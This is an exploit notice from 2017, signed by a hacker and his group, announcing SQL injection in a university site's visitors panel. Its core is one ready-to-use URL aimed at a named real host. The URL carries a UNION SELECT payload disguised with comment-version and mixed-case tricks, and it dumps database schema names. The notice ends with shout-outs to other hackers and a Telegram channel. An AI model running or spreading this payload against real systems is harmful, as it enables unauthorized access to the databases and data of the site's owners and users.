########################## # Exploit Title: Usm Visitors Panel Sql Injection # Date: 2017-10-18 # Discovered By: ArashHC # Tested on : Win10, Win8, Kali Linux ########################## id parameter have SqlI bug! To get Databases: http://www.eng.usm.my/php/visitors/total.php?id=-4%27%20/*!50000uniOn*/%20/*!50000SelEct*/%201,0x3c68313e417261736848433c2f68313e,gRoUp_CoNcat(schema_nAmE)%20fRom%20information_schema.schemata%20--+&show=true ########################## # Only on firefox webbrowser!! ########################## # Thanks to : EreBus, RexProg, Crazy_Boy, AVENGER, ViRuS007, BlackWolfIran, LM7RIX, AliCyber, </ZED>, Agent W, AnonyCoder, Sarbaz Vatan, unknown0707, FarsProg # https://t.me/CyberSoldiersST # Discovered By: ArashHC